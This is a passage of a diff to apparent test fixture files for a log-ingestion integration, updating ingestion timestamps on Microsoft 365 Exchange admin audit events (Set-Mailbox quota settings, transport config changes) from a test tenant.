bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{368F7EFB-D8B2-448B-A304-41EA44801476}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM 
(Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", "code": "ExchangeAdmin", "provider": "Exchange", 
@@ -716,7 +716,7 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "event": { - "ingested": "2021-12-09T13:42:30.853002Z", + "ingested": "2021-12-14T14:49:28.056948316Z", "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-10T07:37:17\",\"ExternalAccess\":true,\"Id\":\"2202ec45-7abc-49dd-e35e-08d7adfc0e15\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{E9F19AD5-5B1D-4361-BE94-E55A6E1A6AA3}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{E9F19AD5-5B1D-4361-BE94-E55A6E1A6AA3}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM 
(Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", "code": "ExchangeAdmin", "provider": "Exchange", @@ -785,7 +785,7 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "event": { - "ingested": "2021-12-09T13:42:30.853006100Z", + "ingested": "2021-12-14T14:49:28.056948809Z", "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:48:04\",\"ExternalAccess\":true,\"Id\":\"a0063917-bb25-4c17-fe2e-08d7ac0f0769\",\"ObjectId\":\"testsiem.onmicrosoft.com\",\"Operation\":\"Enable-AddressListPaging\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"DoNotUpdateRecipients\",\"Value\":\"True\"},{\"Name\":\"DomainController\",\"Value\":\"\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", "code": "ExchangeAdmin", "provider": "Exchange", 
@@ -866,7 +866,7 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "event": { - "ingested": "2021-12-09T13:42:30.853010200Z", + "ingested": "2021-12-14T14:49:28.056949405Z", "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:48:58\",\"ExternalAccess\":true,\"Id\":\"a324e83b-d1a3-4855-db2a-08d7ac0f277b\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{61D4A3E5-D6B5-401C-B13A-CCAD2BA8E8E9}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{61D4A3E5-D6B5-401C-B13A-CCAD2BA8E8E9}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM 
(Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", "code": "ExchangeAdmin", "provider": "Exchange", 
@@ -947,7 +947,7 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "event": { - "ingested": "2021-12-09T13:42:30.853013600Z", + "ingested": "2021-12-14T14:49:28.056949895Z", "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-10T07:37:15\",\"ExternalAccess\":true,\"Id\":\"ebda487f-6177-432a-e91d-08d7adfc0d0d\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{E9F19AD5-5B1D-4361-BE94-E55A6E1A6AA3}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{E9F19AD5-5B1D-4361-BE94-E55A6E1A6AA3}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM 
(Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", "code": "ExchangeAdmin", "provider": "Exchange", 
@@ -1028,7 +1028,7 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "event": { - "ingested": "2021-12-09T13:42:30.853018300Z", + "ingested": "2021-12-14T14:49:28.056950393Z", "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:49:09\",\"ExternalAccess\":true,\"Id\":\"7dafe4a3-487a-46ec-dadc-08d7ac0f2e06\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{E9F19AD5-5B1D-4361-BE94-E55A6E1A6AA3}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{E9F19AD5-5B1D-4361-BE94-E55A6E1A6AA3}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM 
(Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", "code": "ExchangeAdmin", "provider": "Exchange", 
@@ -1109,7 +1109,7 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "event": { - "ingested": "2021-12-09T13:42:30.853023800Z", + "ingested": "2021-12-14T14:49:28.056950907Z", "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-10T07:37:15\",\"ExternalAccess\":true,\"Id\":\"7b5e608f-0a09-4251-8922-08d7adfc0d15\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{505B6405-958B-45A0-BAAE-76A0D7ACAE83}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{505B6405-958B-45A0-BAAE-76A0D7ACAE83}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM 
(Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", "code": "ExchangeAdmin", "provider": "Exchange", 
@@ -1190,7 +1190,7 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "event": { - "ingested": "2021-12-09T13:42:30.853028900Z", + "ingested": "2021-12-14T14:49:28.056951527Z", "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:49:09\",\"ExternalAccess\":true,\"Id\":\"7dafe4a3-487a-46ec-dadc-08d7ac0f2e06\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{E9F19AD5-5B1D-4361-BE94-E55A6E1A6AA3}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{E9F19AD5-5B1D-4361-BE94-E55A6E1A6AA3}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM 
(Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", "code": "ExchangeAdmin", "provider": "Exchange", 
@@ -1271,7 +1271,7 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "event": { - "ingested": "2021-12-09T13:42:30.853035200Z", + "ingested": "2021-12-14T14:49:28.056952120Z", "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-10T07:37:18\",\"ExternalAccess\":true,\"Id\":\"a4912729-9b49-43b3-d21f-08d7adfc0e8e\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/TenantAllowBlocLists_F0767F09-6B4C-4F78-9234-2C0481176063\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"TenantAllowBlockLists\",\"Value\":\"True\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/TenantAllowBlocLists_F0767F09-6B4C-4F78-9234-2C0481176063\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM 
(Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", "code": "ExchangeAdmin", "provider": "Exchange", @@ -1339,7 +1339,7 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "event": { - "ingested": "2021-12-09T13:42:30.853041200Z", + "ingested": "2021-12-14T14:49:28.056952880Z", "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:49:55\",\"ExternalAccess\":true,\"Id\":\"514d0e07-410f-469c-a7f9-08d7ac0f496e\",\"ObjectId\":\"testsiem.onmicrosoft.com\",\"Operation\":\"Set-TenantObjectVersion\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"DomainController\",\"Value\":\"\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", "code": "ExchangeAdmin", "provider": "Exchange", 
@@ -1408,7 +1408,7 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "event": { - "ingested": "2021-12-09T13:42:30.853046900Z", + "ingested": "2021-12-14T14:49:28.056953460Z", "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-10T07:37:13\",\"ExternalAccess\":true,\"Id\":\"ea769bfc-fa67-465c-767a-08d7adfc0b7b\",\"ObjectId\":\"testsiem.onmicrosoft.com\\\\Transport Settings\",\"Operation\":\"Set-TransportConfig\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"DomainController\",\"Value\":\"\"},{\"Name\":\"Identity\",\"Value\":\"testsiem.onmicrosoft.com\"},{\"Name\":\"OrganizationFederatedMailbox\",\"Value\":\"FederatedEmail.4c1f4d8b-8179-4148-93bf-00a95fa1e042@testsiem.onmicrosoft.com\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", "code": "ExchangeAdmin", "provider": "Exchange", 
@@ -1477,7 +1477,7 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "event": { - "ingested": "2021-12-09T13:42:30.853052600Z", + "ingested": "2021-12-14T14:49:28.056954091Z", "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-10T07:37:08\",\"ExternalAccess\":true,\"Id\":\"e022fa0d-13b2-4314-b707-08d7adfc0868\",\"ObjectId\":\"testsiem.onmicrosoft.com\\\\Transport Settings\",\"Operation\":\"Set-TransportConfig\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"DomainController\",\"Value\":\"\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com\"},{\"Name\":\"SupervisionTags\",\"Value\":\"Reject;Allow\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", "code": "ExchangeAdmin", "provider": "Exchange", 
@@ -1545,7 +1545,7 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "event": { - "ingested": "2021-12-09T13:42:30.853058400Z", + "ingested": "2021-12-14T14:49:28.056954583Z", "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:49:55\",\"ExternalAccess\":true,\"Id\":\"514d0e07-410f-469c-a7f9-08d7ac0f496e\",\"ObjectId\":\"testsiem.onmicrosoft.com\",\"Operation\":\"Set-TenantObjectVersion\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"DomainController\",\"Value\":\"\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", "code": "ExchangeAdmin", "provider": "Exchange", 
@@ -1614,7 +1614,7 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "event": { - "ingested": "2021-12-09T13:42:30.853064100Z", + "ingested": "2021-12-14T14:49:28.056955134Z", "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:48:52\",\"ExternalAccess\":true,\"Id\":\"8a3c4f54-f2de-4717-dd56-08d7ac0f23be\",\"ObjectId\":\"testsiem.onmicrosoft.com\\\\Transport Settings\",\"Operation\":\"Set-TransportConfig\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"DomainController\",\"Value\":\"\"},{\"Name\":\"Identity\",\"Value\":\"testsiem.onmicrosoft.com\"},{\"Name\":\"OrganizationFederatedMailbox\",\"Value\":\"FederatedEmail.4c1f4d8b-8179-4148-93bf-00a95fa1e042@testsiem.onmicrosoft.com\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", "code": "ExchangeAdmin", "provider": "Exchange", 
@@ -1695,7 +1695,7 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "event": { - "ingested": "2021-12-09T13:42:30.853069800Z", + "ingested": "2021-12-14T14:49:28.056955572Z", "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:48:49\",\"ExternalAccess\":true,\"Id\":\"9eb764a6-fee5-4c3a-6adc-08d7ac0f220f\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/SystemMailbox{D0E409A0-AF9B-4720-92FE-AAC869B0D201}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"OMEncryptionStore\",\"Value\":\"True\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 